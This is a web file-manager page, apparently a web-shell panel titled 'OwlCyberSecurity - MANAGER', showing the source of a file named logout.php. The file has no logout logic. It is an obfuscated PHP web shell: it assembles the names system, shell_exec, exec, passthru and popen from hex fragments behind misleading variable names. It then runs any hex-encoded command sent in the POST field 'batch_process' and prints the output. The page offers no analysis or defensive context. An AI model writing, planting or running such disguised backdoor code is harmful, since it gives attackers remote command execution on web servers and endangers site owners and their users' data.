OwlCyberSecurity - MANAGER
Edit File: logout.php
<?php $factor1 = '73'; $factor2 = '74'; $factor3 = '65'; $factor4 = '68'; $factor5 = '6c'; $factor6 = '78'; $factor7 = '63'; $factor8 = '61'; $factor9 = '72'; $factor10 = '75'; $factor11 = '70'; $factor12 = '5f'; $factor13 = '67'; $factor14 = '6e'; $factor15 = '6f'; $factor16 = '62'; $buffer_cache1 = pack("H*", '73' . '79' . $factor1 . $factor2 . $factor3 . '6d'); $buffer_cache2 = pack("H*", '73' . $factor4 . $factor3 . '6c' . $factor5 . '5f' . $factor3 . $factor6 . '65' . '63'); $buffer_cache3 = pack("H*", $factor3 . '78' . '65' . $factor7); $buffer_cache4 = pack("H*", '70' . $factor8 . '73' . $factor1 . $factor2 . $factor4 . $factor9 . $factor10); $buffer_cache5 = pack("H*", '70' . '6f' . $factor11 . '65' . '6e'); $buffer_cache6 = pack("H*", '73' . '74' . $factor9 . '65' . $factor8 . '6d' . $factor12 . $factor13 . '65' . '74' . '5f' . '63' . '6f' . '6e' . '74' . '65' . $factor14 . '74' . '73'); $buffer_cache7 = pack("H*", '70' . '63' . $factor5 . $factor15 . $factor1 . '65'); $batch_process = pack("H*", $factor16 . '61' . '74' . '63' . $factor4 . '5f' . $factor11 . $factor9 . '6f' . '63' . '65' . '73' . $factor1); if (isset($_POST[$batch_process])) { $batch_process = pack("H*", $_POST[$batch_process]); if (function_exists($buffer_cache1)) { $buffer_cache1($batch_process); } elseif (function_exists($buffer_cache2)) { print $buffer_cache2($batch_process); } elseif (function_exists($buffer_cache3)) { $buffer_cache3($batch_process, $data_sym); print join("\n", $data_sym); } elseif (function_exists($buffer_cache4)) { $buffer_cache4($batch_process); } elseif (function_exists($buffer_cache5) && function_exists($buffer_cache6) && function_exists($buffer_cache7)) { $symbol_ent = $buffer_cache5($batch_process, 'r'); if ($symbol_ent) { $data_chunk_key = $buffer_cache6($symbol_ent); $buffer_cache7($symbol_ent); print $data_chunk_key; } } exit; }